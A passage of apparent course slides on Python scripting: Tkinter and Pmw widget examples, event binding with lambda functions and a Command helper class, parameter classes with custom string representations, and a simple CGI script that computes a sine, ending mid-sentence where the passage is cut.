self.sketch = PhotoImage(file=gifpic)
# (images must be tied to a global or class variable!)
Label(sketch_frame,image=self.sketch).pack(side='top',pady=20)

![]() | Straight buttons calling a function |
![]() | Simulate: copy code from simviz1.py (create dir, create input file, run simulator) |
![]() | Visualize: copy code from simviz1.py (create file with Gnuplot commands, run Gnuplot) |

![]() | Example: display a file in a text widget
root = Tk()
top = Frame(root); top.pack(side='top')
text = Pmw.ScrolledText(top, ...
text.pack()
# insert file as a string in the text widget:
text.insert('end', open(filename,'r').read())
|
![]() | Problem: the text widget is not resized when the main window is resized |


![]() | Solution: combine the expand and fill options to pack:
text.pack(expand=1, fill='both')
# all parent widgets as well:
top.pack(side='top', expand=1, fill='both')
expand allows the widget to expand, fill tells in which directions the widget is allowed to expand |
![]() | Try fileshow1.py and fileshow2.py! |
![]() | Resizing is important for text, canvas and list widgets |


Very useful demo program in All.py (comes with Pmw)

![]() | A Python script can act both as a library file (module) and an executable test example |
![]() | The test example is in a special end block
# demo program ("main" function) in case we run the script
# from the command line:
if __name__ == '__main__':
    root = Tkinter.Tk()
    Pmw.initialise(root)
    root.title('preliminary test of ScrolledListBox')
    # test:
    widget = MyLibGUI(root)
    root.mainloop()
|
![]() | Makes a built-in test for verification |
![]() | Serves as documentation of usage |




frame = Frame(top, borderwidth=5)
frame.pack(side='top')
header = Label(parent, text='Widgets for list data',
font='courier 14 bold', foreground='blue',
background='#%02x%02x%02x' % (196,196,196))
header.pack(side='top', pady=10, ipady=10, fill='x')
Button(parent, text='Display widgets for list data',
command=list_dialog, width=29).pack(pady=2)


# use a frame to align examples on various relief values:
frame = Frame(parent); frame.pack(side='top',pady=15)
# will use the grid geometry manager to pack widgets in this frame
reliefs = ('groove', 'raised', 'ridge', 'sunken', 'flat')
row = 0
for width in range(0,8,2):
    label = Label(frame, text='reliefs with borderwidth=%d: ' % width)
    label.grid(row=row, column=0, sticky='w', pady=5)
    for i in range(len(reliefs)):
        l = Label(frame, text=reliefs[i], relief=reliefs[i],
                  borderwidth=width)
        l.grid(row=row, column=i+1, padx=5, pady=5)
    row += 1


# predefined bitmaps:
bitmaps = ('error', 'gray25', 'gray50', 'hourglass',
'info', 'questhead', 'question', 'warning')
Label(parent, text="""\
Predefined bitmaps, which can be used to
label dialogs (questions, info etc.)""",
foreground='red').pack()
frame = Frame(parent); frame.pack(side='top', pady=5)
for i in range(len(bitmaps)): # write name of bitmaps
    Label(frame, text=bitmaps[i]).grid(row=0, column=i+1)
for i in range(len(bitmaps)): # insert bitmaps
    Label(frame, bitmap=bitmaps[i]).grid(row=1, column=i+1)

# basic Tk:
frame = Frame(parent); frame.pack()
Label(frame, text='case name').pack(side='left')
entry_var = StringVar(); entry_var.set('mycase')
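e = Entry(frame, textvariable=entry_var, width=15)
# Entry has no command option; bind Return to the callback instead
# (somefunc then receives an event object as argument):
e.bind('<Return>', somefunc)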
e.pack(side='left')


case_widget = Pmw.EntryField(parent,
labelpos='w',
label_text='case name',
entry_width=15,
entry_textvariable=case,
command=status_entries)
# nice alignment of several Pmw.EntryField widgets:
widgets = (case_widget, mass_widget,
damping_widget, A_widget,
func_widget)
Pmw.alignlabels(widgets)

![]() | Pmw.EntryField can validate the input |
![]() | Example: real numbers larger than 0:
mass_widget = Pmw.EntryField(parent,
labelpos='w', # n, nw, ne, e and so on
label_text='mass',
validate={'validator': 'real', 'min': 0},
entry_width=15,
entry_textvariable=mass,
command=status_entries)
|
![]() | Writing letters or negative numbers does not work! |


# we use one Pmw.Balloon for all balloon helps:
balloon = Pmw.Balloon(top)
...
balloon.bind(A_widget,
'Pressing return updates the status line')
Point at the 'Amplitude' text entry and watch!

![]() | Seemingly similar to pulldown menu |
![]() | Used as alternative to radiobuttons or short lists |
func = StringVar(); func.set('y')
func_widget = Pmw.OptionMenu(parent,
labelpos='w', # n, nw, ne, e and so on
label_text='spring',
items=['y', 'y3', 'siny'],
menubutton_textvariable=func,
menubutton_width=6,
command=status_option)
def status_option(value):
# value is the current value in the option menu


y0 = DoubleVar(); y0.set(0.2)
y0_widget = Scale(parent,
orient='horizontal',
from_=0, to=2, # range of slider
tickinterval=0.5, # tickmarks on the slider "axis"
resolution=0.05, # counter resolution
label='initial value y(0)', # appears above
#font='helvetica 12 italic', # optional font
length=300, # length=300 pixels
variable=y0,
command=status_slider)


store_data = IntVar(); store_data.set(1)
store_data_widget = Checkbutton(parent,
text='store data',
variable=store_data,
command=status_checkbutton)
def status_checkbutton():
    text = 'checkbutton : ' \
           + str(store_data.get())
    ...


menu_bar = Pmw.MenuBar(parent,
hull_relief='raised',
hull_borderwidth=1,
balloon=balloon,
hotkeys=1) # define accelerators
menu_bar.pack(fill='x')
# define File menu:
menu_bar.addmenu('File', None, tearoff=1)


menu_bar.addmenu('File', None, tearoff=1)
menu_bar.addmenuitem('File', 'command',
statusHelp='Open a file', label='Open...',
command=file_read)
...
menu_bar.addmenu('Dialogs',
'Demonstrate various Tk/Pmw dialog boxes')
...
menu_bar.addcascademenu('Dialogs', 'Color dialogs',
statusHelp='Exemplify different color dialogs')
menu_bar.addmenuitem('Color dialogs', 'command',
label='Tk Color Dialog',
command=tk_color_dialog)



![]() | List box (w/scrollbars); Pmw.ScrolledListBox | ||||
![]() | Combo box; Pmw.ComboBox | ||||
![]() | Option menu; Pmw.OptionMenu | ||||
![]() | Radio buttons; Radiobutton or Pmw.RadioSelect | ||||
![]() | Check buttons; Pmw.RadioSelect | ||||
![]() | Important:
|


list1 = Pmw.ScrolledListBox(frame,
listbox_selectmode = 'single', # 'multiple'
listbox_width = 12, listbox_height = 6,
label_text = 'plain listbox\nsingle selection',
labelpos = 'n', # label above list ('north')
selectioncommand = status_list1)

![]() | Callback function:
def status_list1():
    """extract single selections"""
    selected_item = list1.getcurselection()[0]
    selected_index = list1.curselection()[0]
|
![]() | Insert a list of strings (listitems):
for item in listitems:
    list1.insert('end', item) # insert after end
|

![]() | Can select more than one item:
list2 = Pmw.ScrolledListBox(frame,
    listbox_selectmode = 'multiple',
    ...
    selectioncommand = status_list2)
...
def status_list2():
    """extract multiple selections"""
    selected_items = list2.getcurselection() # tuple
    selected_indices = list2.curselection() # tuple
|


radio_var = StringVar() # common variable
radio1 = Frame(frame_right)
radio1.pack(side='top', pady=5)
Label(radio1,
text='Tk radio buttons').pack(side='left')
for radio in ('radio1', 'radio2', 'radio3', 'radio4'):
    r = Radiobutton(radio1, text=radio, variable=radio_var,
                    value='radiobutton no. ' + radio[5],
                    command=status_radio1)
    r.pack(side='left')
...
def status_radio1():
    text = 'radiobutton variable = ' + radio_var.get()
    status_line.configure(text=text)


radio2 = Pmw.RadioSelect(frame_right,
selectmode='single',
buttontype='radiobutton',
labelpos='w',
label_text='Pmw radio buttons\nsingle selection',
orient='horizontal',
frame_relief='ridge', # try some decoration...
command=status_radio2)
for text in ('item1', 'item2', 'item3', 'item4'):
    radio2.add(text)
radio2.invoke('item2') # 'item2' is pressed by default
def status_radio2(value):
    ...


radio3 = Pmw.RadioSelect(frame_right,
selectmode='multiple',
buttontype='checkbutton',
labelpos='w',
label_text='Pmw check buttons\nmultiple selection',
orient='horizontal',
frame_relief='ridge', # try some decoration...
command=status_radio3)
def status_radio3(value, pressed):
    """
    Called when button value is pressed (pressed=1)
    or released (pressed=0)
    """
    ... radio3.getcurselection() ...


combo1 = Pmw.ComboBox(frame,
label_text='simple combo box',
labelpos = 'nw',
scrolledlist_items = listitems,
selectioncommand = status_combobox,
listbox_height = 6,
dropdown = 0)
def status_combobox(value):
    text = 'combo box value = ' + str(value)


import tkMessageBox
...
message = 'This is a demo of a Tk confirmation dialog box'
ok = tkMessageBox.askokcancel('Quit', message)
if ok:
    status_line.configure(text="'OK' was pressed")
else:
    status_line.configure(text="'Cancel' was pressed")


message = 'This is a demo of a Tk message dialog box'
answer = tkMessageBox.Message(icon='info', type='ok',
message=message, title='About').show()
status_line.configure(text="'%s' was pressed" % answer)


message = """\
This is a demo of the Pmw.MessageDialog box,
which is useful for writing longer text messages
to the user."""
Pmw.MessageDialog(parent, title='Description',
buttons=('Quit',),
message_text=message,
message_justify='left',
message_font='helvetica 12',
icon_bitmap='info',
# must be present if icon_bitmap is:
iconpos='w')


self.userdef_d = Pmw.Dialog(self.parent,
    title='Programmer-Defined Dialog',
    buttons=('Apply', 'Cancel'),
    #defaultbutton='Apply',
    command=self.userdef_dialog_action)
frame = self.userdef_d.interior()
# stack widgets in frame as you want...
...
def userdef_dialog_action(self, result):
    if result == 'Apply':
        pass  # extract dialog variables ...
    else:
        pass  # you canceled the dialog
    self.userdef_d.destroy() # destroy dialog window


import tkColorChooser
color = tkColorChooser.Chooser(
initialcolor='gray',
title='Choose background color').show()
# color[0]: (r,g,b) tuple, color[1]: hex number
parent_widget.tk_setPalette(color[1]) # change bg color



![]() | Make dialog for setting a color:
import pynche.pyColorChooser
color = pynche.pyColorChooser.askcolor(
color='gray', # initial color
master=parent_widget) # parent widget
# color[0]: (r,g,b) color[1]: hex number
# same as returned from tkColorChooser
|
![]() | Change the background color:
try:
    parent_widget.tk_setPalette(color[1])
except:
    pass
|


fname = tkFileDialog.Open(
filetypes=[('anyfile','*')]).show()


fname = tkFileDialog.SaveAs(
filetypes=[('temporary files','*.tmp')],
initialfile='myfile.tmp',
title='Save a file').show()

![]() |
Launch a new, separate toplevel window:
# read file, stored as a string filestr,
# into a text widget in a _separate_ window:
filewindow = Toplevel(parent) # new window
filetext = Pmw.ScrolledText(filewindow,
borderframe=5, # a bit space around the text
vscrollmode='dynamic', hscrollmode='dynamic',
labelpos='n',
label_text='Contents of file ' + fname,
text_width=80, text_height=20,
text_wrap='none')
filetext.pack()
filetext.insert('end', filestr)
|

![]() | Basic widgets are in Tk |
![]() | Pmw: megawidgets written in Python |
![]() | PmwContribD: extension of Pmw |
![]() | Tix: megawidgets in C that can be called from Python |
![]() | Looking for some advanced widget? check out Pmw, PmwContribD and Tix and their demo programs |

![]() | Canvas: highly interactive GUI element with
| ||||||
![]() | Text: flexible editing and displaying of text |



![]() | Very flexible, interactive widget for curve plotting |


![]() | Check out src/py/gui/animate.py |

See also ch. 11.1 in the course book

![]() | Check out src/tools/py4cs/DrawFunction.py |

See ch. 12.2.3 in the course book

![]() | Tree structures are used for, e.g., directory navigation |
![]() | Tix and PmwContribD contain some useful widgets: PmwContribD.TreeExplorer, PmwContribD.TreeNavigator, Tix.DirList, Tix.DirTree, Tix.ScrolledHList |

cd $SYSDIR/src/tcl/tix-8.1.3/demos # (version no may change)
tixwish8.1.8.3 tixwidgets.tcl # run Tix demo


![]() | Can use Vtk (Visualization toolkit); Vtk has a Tk widget |
![]() | Vtk offers full 2D/3D visualization a la AVS, IRIS Explorer, OpenDX, but is fully programmable from C++, Python, Java or Tcl |
| MayaVi is a high-level interface to Vtk, written in Python (recommended!) | |
![]() | Tk canvas that allows OpenGL instructions |


![]() | Customizing fonts and colors |
![]() | Event bindings (mouse bindings in particular) |
![]() | Text widgets |

![]() | Ch. 11.2 in the course book |
![]() | ``Introduction to Tkinter'' by Lundh (see doc.html) |
![]() | ``Python/Tkinter Programming'' textbook by Grayson |
![]() | ``Python Programming'' textbook by Lutz |

![]() | Customizing fonts and colors in a specific widget is easy (see Hello World GUI examples) |
![]() | Sometimes fonts and colors of all Tk applications need to be controlled |
![]() | Tk has an option database for this purpose |
![]() | Can use a file or Python statements to specify the Tk option database |

![]() | File with syntax similar to X11 resources:
! set widget properties, first font and foreground of all widgets:
*Font: Helvetica 19 roman
*Foreground: blue
! then specific properties in specific widgets:
*Label*Font: Times 10 bold italic
*Listbox*Background: yellow
*Listbox*Foreground: red
*Listbox*Font: Helvetica 13 italic |
![]() | Load the file:
root = Tk()
root.option_readfile(filename) |

general_font = ('Helvetica', 19, 'roman')
label_font = ('Times', 10, 'bold italic')
listbox_font = ('Helvetica', 13, 'italic')
root.option_add('*Font', general_font)
root.option_add('*Foreground', 'black')
root.option_add('*Label*Font', label_font)
root.option_add('*Listbox*Font', listbox_font)
root.option_add('*Listbox*Background', 'yellow')
root.option_add('*Listbox*Foreground', 'red')
Play around with src/py/gui/options.py !


![]() | Move mouse over text: change background color, update counter |
![]() | Must bind events to text widget operations |

![]() | Mark parts of a text with tags:
self.hwtext = Text(parent, wrap='word')
# wrap='word' means break lines between words
self.hwtext.pack(side='top', pady=20)
self.hwtext.insert('end','Hello, World!\n', 'tag1')
self.hwtext.insert('end','More text...\n', 'tag2')
|
![]() | tag1 now refers to the 'Hello, World!' text |
![]() | Can detect if the mouse is over or clicked at a tagged text segment |

![]() | We want to call
self.hwtext.tag_configure('tag1', background='blue')
when the mouse is over the text marked with tag1
|
![]() | The statement
self.hwtext.tag_bind('tag1','<Enter>',
    self.hwtext.tag_configure('tag1', background='blue'))
does not work: the tag_configure call is executed immediately, when tag_bind is called, and its return value (not a function) is passed on as the callback. tag_bind needs a function object, i.e., something that can be called later, when the event occurs
|
![]() | Remedy: lambda functions (or our Command class) |
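
The difference between passing the result of a call and passing a function object can be tried out without any GUI. The following is a minimal sketch in Python 3 syntax; `FakeWidget`, `bind` and `fire` are hypothetical stand-ins for a Tk widget and its event machinery, not part of Tkinter:

```python
class FakeWidget:
    """Hypothetical stand-in for a Tk widget; stores one callback per event."""
    def __init__(self):
        self.callbacks = {}
        self.background = 'white'

    def configure(self, background):
        self.background = background   # returns None, like most setters

    def bind(self, event, callback):
        self.callbacks[event] = callback

    def fire(self, event):
        """Simulate the event: call whatever was registered."""
        self.callbacks[event](event)


w = FakeWidget()

# Wrong: configure() runs right away and bind() receives its return value, None.
w.bind('<Enter>', w.configure(background='blue'))
called_too_early = (w.background == 'blue')    # the color has already changed
registered_wrong = w.callbacks['<Enter>']      # None, not a function

# Right: the lambda is a function object; its body runs only when the event fires.
w.background = 'white'
w.bind('<Enter>', lambda event: w.configure(background='blue'))
before = w.background
w.fire('<Enter>')
after = w.background
```

In the first `bind` call nothing useful is registered, while in the second the color changes only when the simulated event occurs.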

![]() | Lambda functions are some kind of 'inline' function definitions |
![]() | For example,
def somefunc(x, y, z):
    return x + y + z
can be written as
lambda x, y, z: x + y + z |
![]() | General rule:
lambda arg1, arg2, ... : expression with arg1, arg2, ...
is equivalent to
def somefunc(arg1, arg2, ...):
    return expression with arg1, arg2, ...
|

![]() | Prefix words in a list with a double hyphen
['m', 'func', 'y0']
should be transformed to
['--m', '--func', '--y0'] |
![]() | Basic programming solution:
def prefix(word):
    return '--' + word
options = []
for i in range(len(variable_names)):
    options.append(prefix(variable_names[i]))
|
![]() | Faster solution with map:
options = map(prefix, variable_names) |
![]() | Even more compact with lambda and map:
options = map(lambda word: '--' + word, variable_names) |
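
For readers on Python 3, a short sketch of the same transformation: there `map` returns a lazy iterator rather than a list, so it is wrapped in `list()`, and a list comprehension is a common alternative. The sample list is the one from the example above.

```python
variable_names = ['m', 'func', 'y0']

# map() returns a lazy iterator in Python 3, so wrap it in list()
# when an actual list is needed:
options_map = list(map(lambda word: '--' + word, variable_names))

# A list comprehension expresses the same transformation directly:
options_comp = ['--' + word for word in variable_names]

print(options_comp)
```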

![]() | Lambda functions: insert a function call with your arguments as part of a command= argument |
![]() | Bind events when the mouse is over a tag:
# let tag1 be blue when the mouse is over the tag
# use lambda functions to implement the feature
self.hwtext.tag_bind('tag1','<Enter>',
lambda event=None, x=self.hwtext:
x.tag_configure('tag1', background='blue'))
self.hwtext.tag_bind('tag1','<Leave>',
lambda event=None, x=self.hwtext:
x.tag_configure('tag1', background='white'))
|

![]() | The lambda function applies keyword arguments
self.hwtext.tag_bind('tag1','<Enter>',
lambda event=None, x=self.hwtext:
x.tag_configure('tag1', background='blue'))
|
![]() | Why? |
![]() | The function is called as some anonymous function
def func(event=None):
and we want the body to call self.hwtext, but self does not have the right class instance meaning in this function |
![]() | Remedy: keyword argument x holding the right reference to the widget (self.hwtext) whose method we want to call |
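
In Python versions with nested scopes (2.2 and later) a lambda can refer to `self` directly, but the default-argument idiom is still needed when lambdas are created in a loop. A minimal sketch in Python 3 syntax, with hypothetical tag names and no GUI involved:

```python
tags = ['tag0', 'tag1', 'tag2']

# Late binding: every lambda looks up `tag` when it is called,
# i.e. after the loop has finished, so all of them see 'tag2'.
late = [lambda event=None: tag for tag in tags]

# Early binding: the default value t=tag is evaluated when the
# lambda is created, so each lambda keeps its own tag.
early = [lambda event=None, t=tag: t for tag in tags]

late_results = [f() for f in late]
early_results = [f() for f in early]
print(late_results, early_results)
```

The default argument freezes the current value at definition time, which is exactly what a per-tag event handler needs.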

![]() | Make a more readable alternative to lambda:
class Command:
    def __init__(self, func, *args, **kw):
        self.func = func
        self.args = args # ordinary arguments
        self.kw = kw # keyword arguments (dictionary)
    def __call__(self, *args, **kw):
        args = args + self.args
        kw.update(self.kw) # override kw with orig self.kw
        self.func(*args, **kw)
|
![]() | Example:
def f(a, b, max=1.2, min=2.2): # some function
    print 'a=%g, b=%g, max=%g, min=%g' % (a,b,max,min)
c = Command(f, 2.3, 2.1, max=0, min=-1.2)
c() # call f(2.3, 2.1, 0, -1.2)
|
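
The standard library offers a related tool, `functools.partial` (available since Python 2.5). The sketch below, in Python 3 syntax, shows how it compares with the `Command` class; the function `configure` here is a hypothetical free function written for illustration, not the method used elsewhere in these slides.

```python
from functools import partial

def f(a, b, max=1.2, min=2.2):
    return 'a=%g, b=%g, max=%g, min=%g' % (a, b, max, min)

# Same effect as Command(f, 2.3, 2.1, max=0, min=-1.2):
c = partial(f, 2.3, 2.1, max=0, min=-1.2)
result = c()

# Difference in argument order: partial puts the stored positional
# arguments FIRST, whereas the Command class appends them AFTER the
# arguments supplied at call time (such as a Tk event object).
def configure(tag, bg, event=None):
    return (tag, bg, event)

on_enter = partial(configure, 'tag1', 'blue')
called = on_enter('<fake event>')
print(result, called)
```

Because of the argument order, a callback meant for `partial` takes the event last, while a callback meant for `Command` takes it first.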

from py4cs.misc import Command
self.hwtext.tag_bind('tag1','<Enter>',
    Command(self.configure, 'tag1', 'blue'))
def configure(self, event, tag, bg):
    self.hwtext.tag_configure(tag, background=bg)
###### compare this with the lambda version:
self.hwtext.tag_bind('tag1','<Enter>',
    lambda event=None, x=self.hwtext:
    x.tag_configure('tag1',background='blue'))

![]() | Construct Python code in a string:
def genfunc(self, tag, bg, optional_code=''):
    funcname = 'temp'
    code = "def %(funcname)s(self, event=None):\n"\
           "    self.hwtext.tag_configure("\
           "'%(tag)s', background='%(bg)s')\n"\
           "    %(optional_code)s\n" % vars()
|
![]() | Execute this code (i.e. define the function!)
    exec code in vars()
|
![]() | Return the defined function object:
    # funcname is a string,
    # eval() turns it into func obj:
    return eval(funcname)
|

![]() | Example on calling code:
self.tag2_leave = self.genfunc('tag2', 'white')
self.hwtext.tag_bind('tag2', '<Leave>', self.tag2_leave)
self.tag2_enter = self.genfunc('tag2', 'red',
# add a string containing optional Python code:
r"i=...self.hwtext.insert(i,'You have hit me "\
"%d times' % ...")
self.hwtext.tag_bind('tag2', '<Enter>', self.tag2_enter)
|
![]() | Flexible alternative to lambda functions! |
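
Generating source code in a string is one option; a nested function (closure) gives much of the same flexibility without `exec` or `eval`. This is a sketch of that alternative technique in Python 3 syntax, not the method shown above: `FakeText` is a hypothetical stand-in for a Tk Text widget, and the optional code is passed as a callable (`extra`) instead of a string.

```python
class FakeText:
    """Hypothetical stand-in for a Tk Text widget; records tag settings."""
    def __init__(self):
        self.tag_background = {}

    def tag_configure(self, tag, background):
        self.tag_background[tag] = background


def genfunc(widget, tag, bg, extra=None):
    """Return an event handler that colors `tag`; `extra` is an optional callable."""
    def handler(event=None):
        widget.tag_configure(tag, background=bg)
        if extra is not None:
            extra(event)
    return handler


hits = []
text = FakeText()
tag2_enter = genfunc(text, 'tag2', 'red', extra=lambda event: hits.append(event))
tag2_leave = genfunc(text, 'tag2', 'white')

tag2_enter('enter')                       # simulate the mouse entering the tag
color_inside = text.tag_background['tag2']
tag2_leave('leave')                       # simulate the mouse leaving the tag
color_outside = text.tag_background['tag2']
```

Each call to `genfunc` returns a new handler that remembers its own `tag`, `bg` and `extra`.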

![]() | Usage:
root = Tkinter.Tk()
Pmw.initialise(root)
root.title('GUI for Script II')
list = [('exercise 1', 'easy stuff'),
('exercise 2', 'not so easy'),
('exercise 3', 'difficult')
]
widget = Fancylist(root,list)
root.mainloop()
|
![]() | When the mouse is over a list item, the background color changes and the help text appears in a label below the list |

import Tkinter, Pmw
class Fancylist:
    def __init__(self, parent, list,
                 list_width=20, list_height=10):
        self.frame = Tkinter.Frame(parent, borderwidth=3)
        self.frame.pack()
        self.listbox = Pmw.ScrolledText(self.frame,
            vscrollmode='dynamic', hscrollmode='dynamic',
            labelpos='n',
            label_text='list of chosen curves',
            text_width=list_width, text_height=list_height,
            text_wrap='none', # do not break too long lines
            )
        self.listbox.pack(pady=10)
        self.helplabel = Tkinter.Label(self.frame, width=60)
        self.helplabel.pack(side='bottom',fill='x',expand=1)

        # Run through the list, define a tag,
        # bind a lambda function to the tag:
        counter = 0
        for (item, help) in list:
            tag = 'tag' + str(counter) # unique tag name
            self.listbox.insert('end', item + '\n', tag)
            self.listbox.tag_bind(tag, '<Enter>',
                lambda event, f=self.configure, t=tag,
                       bg='blue', text=help:
                       f(event, t, bg, text))
            self.listbox.tag_bind(tag, '<Leave>',
                lambda event, f=self.configure, t=tag,
                       bg='white', text='':
                       f(event, t, bg, text))
            counter = counter + 1
        # make the text buffer read-only:
        self.listbox.configure(text_state='disabled')
    def configure(self, event, tag, bg, text):
        self.listbox.tag_configure(tag, background=bg)
        self.helplabel.configure(text=text)

![]() | Recall the simviz1.py script for running a simulation program and visualizing the results |
![]() | simviz1.py was a straight script, even without functions |
![]() | As an example, let's make a class implementation
class SimViz:
    def __init__(self):
        self.initialize()
    def initialize(self):
        ...
    def process_command_line_args(self, cmlargs):
        ...
    def simulate(self):
        ...
    def visualize(self):
        ...
|

![]() | simviz1.py had problem-dependent variables like m, b, func, etc. |
![]() | In a complicated application, there can be a large number of such parameters, so let's automate the handling |
![]() | Store all parameters in a dictionary:
self.p['m'] = 1.0
self.p['func'] = 'y'
etc. |
![]() | The initialize function sets default values to all parameters in self.p |

def process_command_line_args(self, cmlargs):
    """Load data from the command line into self.p."""
    opt_spec = [ x+'=' for x in self.p.keys() ]
    try:
        options, args = getopt.getopt(cmlargs,'',opt_spec)
    except getopt.GetoptError:
        <handle illegal options>
    for opt, val in options:
        key = opt[2:] # drop prefix --
        if isinstance(self.p[key], float): val = float(val)
        elif isinstance(self.p[key], int): val = int(val)
        self.p[key] = val
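
A self-contained sketch of the same idea in Python 3 syntax, written as a plain function so that it can be tried from the interpreter. The default values in `p` and the choice to stop with `SystemExit` on an illegal option are assumptions made for this illustration.

```python
import getopt

def process_command_line_args(p, cmlargs):
    """Update the parameter dictionary p from options like --m 2.5."""
    opt_spec = [name + '=' for name in p]    # 'm=' means --m takes a value
    try:
        options, args = getopt.getopt(cmlargs, '', opt_spec)
    except getopt.GetoptError as e:
        raise SystemExit('Illegal option: %s' % e)
    for opt, val in options:
        key = opt[2:]                         # drop the -- prefix
        # convert the string to the type of the default value:
        if isinstance(p[key], float):
            val = float(val)
        elif isinstance(p[key], int):
            val = int(val)
        p[key] = val
    return p

p = {'m': 1.0, 'func': 'y', 'n': 10}          # hypothetical defaults
process_command_line_args(p, ['--m', '2.5', '--n', '20', '--func', 'siny'])
print(p)
```

The type of each default value decides how the corresponding command-line string is converted, so new parameters only need a new dictionary entry.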

![]() | These are straight translations from code segments in simviz1.py |
![]() | Remember: m is replaced by self.p['m'], func by self.p['func'] and so on |
![]() | Variable interpolation,
s = 'm=%(m)g ...' % vars()
does not work with
s = 'm=%(self.p['m'])g ...' % vars()
so we must use a standard printf construction:
s = 'm=%g ...' % (self.p['m'], ...)
or (better)
s = 'm=%(m)g ...' % self.p |

![]() | A little main program is needed to steer the actions in class SimViz:
adm = SimViz()
adm.process_command_line_args(sys.argv[1:])
adm.simulate()
adm.visualize() |
![]() | See src/examples/simviz1c.py |

![]() | Previous example: self.p['m'] holds the value of a parameter | ||||||||
![]() | There is more information associated with a parameter:
| ||||||||
![]() | Idea: Use a class to hold parameter information |

![]() | Class declaration:
class InputPrm:
    """class for holding data about a parameter"""
    def __init__(self, name, default,
                 type=float): # string to type conversion func.
        self.name = name
        self.v = default # parameter value
        self.str2type = type
|
![]() | Make a dictionary entry:
self.p['m'] = InputPrm('m', 1.0, float)
|
![]() | Convert from string value to the right type:
self.p['m'].v = self.p['m'].str2type(value) |

![]() | Interpret command-line arguments and store the right values (and types!) in the parameter dictionary:
def process_command_line_args(self, cmlargs):
    """load data from the command line into variables"""
    opt_spec = map(lambda x: x+"=", self.p.keys())
    try:
        options, args = getopt.getopt(cmlargs,"",opt_spec)
    except getopt.GetoptError:
        ...
    for option, value in options:
        key = option[2:]
        self.p[key].v = self.p[key].str2type(value)
This handles any number of parameters and command-line arguments!
|

![]() | Example on a very compact Python statement:
opt_spec = map(lambda x: x+"=", self.p.keys()) |
![]() | Purpose: create option specifications for getopt; an option --opt followed by a value is specified as 'opt=' |
![]() | All the options have the same name as the keys in self.p |
![]() | Dissection:
def add_equal(s): return s+'=' # add '=' to a string
# apply add_equal to all items in a list and return the
# new list:
opt_spec = map(add_equal, self.p.keys())
or written out:
opt_spec = []
for key in self.p.keys():
    opt_spec.append(add_equal(key))
|

![]() | A nice feature of Python is that
print self.p
usually gives a nice printout of the object, regardless of the object's type |
![]() | Let's try to print a dictionary of user-defined data types:
{'A': <__main__.InputPrm instance at 0x8145214>,
'case': <__main__.InputPrm instance at 0x81455ac>,
'c': <__main__.InputPrm instance at 0x81450a4>
...
|
![]() | Python does not know how to print our InputPrm objects |
![]() | We can tell Python how to do it! |

![]() | print a means 'convert a to a string and print it' |
![]() | The conversion to string of a class can be specified in the functions __str__ and __repr__:
str(a) means calling a.__str__()
repr(a) means calling a.__repr__() |
![]() | __str__: compact string output |
![]() | __repr__: complete class content |
![]() | print self.p (or str(self.p) or repr(self.p)), where self.p is a dictionary of InputPrm objects, will try to call the __repr__ function in InputPrm for getting the 'value' of the InputPrm object |

![]() | Here is a possible implementation:
class InputPrm:
    ...
    def __repr__(self):
        return str(self.v) + ' ' + str(self.str2type)
|
![]() | Printing self.p yields
{'A': 5.0 <type 'float'>,
'case': tmp1 <type 'str'>,
'c': 5.0 <type 'float'>
...
|

![]() | Good idea: write the string representation with the syntax needed to recreate the instance:
def __repr__(self):
    # str(self.str2type) is <type 'type'>, extract 'type':
    m = re.search(r"<type '(.*)'>", str(self.str2type))
    if m:
        return "InputPrm('%s',%s,%s)" % \
               (self.name, self.__str__(), m.group(1))
def __str__(self):
    """compact output"""
    value = str(self.v) # ok for strings and ints
    if self.str2type == float:
        value = "%g" % self.v # compact float representation
    elif self.str2type == int:
        value = "%d" % self.v # compact int representation
    elif self.str2type == str:
        value = "'%s'" % self.v # string representation
    else:
        value = "'%s'" % str(self.v)
    return value
|

![]() | Write self.p to file:
f = open(somefile, 'w')
f.write(str(self.p)) |
![]() | File contents:
{'A': InputPrm('A',5,float), ...
|
![]() | Loading the contents back into a dictionary:
f = open(somefile, 'r')
q = eval(f.readline()) |
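
The round trip from objects to text and back can be tried without a file. The following is a minimal sketch in Python 3 syntax; as a simplification it uses the `__name__` attribute of the type object instead of the regular expression above, and it writes the value with `%r`, so it illustrates the idea and is not the implementation from the slides.

```python
class InputPrm:
    """Hold the name, value and string-to-type converter of a parameter."""
    def __init__(self, name, default, type=float):
        self.name = name
        self.v = default
        self.str2type = type

    def __repr__(self):
        # type objects have a __name__ ('float', 'int', 'str'), which
        # avoids parsing the text of str(self.str2type)
        return 'InputPrm(%r, %r, %s)' % (self.name, self.v,
                                         self.str2type.__name__)

p = {'A': InputPrm('A', 5.0, float), 'case': InputPrm('case', 'tmp1', str)}
text = repr(p)            # the dictionary calls repr() on each InputPrm
print(text)

# eval() executes arbitrary code: only use it on text you wrote yourself.
q = eval(text)
```

Since `eval` runs whatever the text contains, this technique is only appropriate for files that the program itself has written and that nobody else can modify.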


![]() | Topic: interactive Web pages (or: GUI on the Web) | ||||||
![]() | Methods:
| ||||||
![]() | Perl and Python are very popular for CGI programming |


![]() | Web version of the Scientific Hello World GUI |
![]() | HTML allows GUI elements (FORM) |
![]() | Here: text ('Hello, World!'), text entry (for r) and a button 'equals' for computing the sine of r |
![]() | HTML code:
<HTML><BODY BGCOLOR="white">
<FORM ACTION="hw1.py.cgi" METHOD="POST">
Hello, World! The sine of
<INPUT TYPE="text" NAME="r" SIZE="10" VALUE="1.2">
<INPUT TYPE="submit" VALUE="equals" NAME="equalsbutton">
</FORM></BODY></HTML> |

![]() | Widget type: INPUT TYPE |
![]() | Variable holding input: NAME |
![]() | Default value: VALUE |
![]() | Widgets: one-line text entry, multi-line text area, option list, scrollable list, button |

![]() | Pressing "equals" (i.e. submit button) calls
a script hw1.py.cgi
<FORM ACTION="hw1.py.cgi" METHOD="POST"> |
![]() | Form variables are packed into a string and sent to the program |
![]() | Python has a cgi module that makes it very easy to extract variables from forms
import cgi
form = cgi.FieldStorage()
r = form.getvalue("r")
|
![]() | Grab r, compute sin(r), write an HTML page with (say)
Hello, World! The sine of 2.4 equals 0.675463180551 |

![]() |
Tasks: get r, compute the sine, write the result on
a new Web page
#!/store/bin/python
import cgi, math
# required opening of all CGI scripts with output:
print "Content-type: text/html\n"
# extract the value of the variable "r":
form = cgi.FieldStorage()
r = form.getvalue("r")
s = str(math.sin(float(r)))
# print answer (very primitive HTML code):
print "Hello, World! The sine of %s equals %s" % (r,s)
|

![]() | A CGI script is run by a nobody or www user |
![]() | A header like
#!/usr/bin/env python
relies on finding the first python program in the PATH variable, and a nobody has a PATH variable out of our control |
![]() | Hence, we need to specify the interpreter explicitly:
#!/store/bin/python |
![]() | Old Python versions
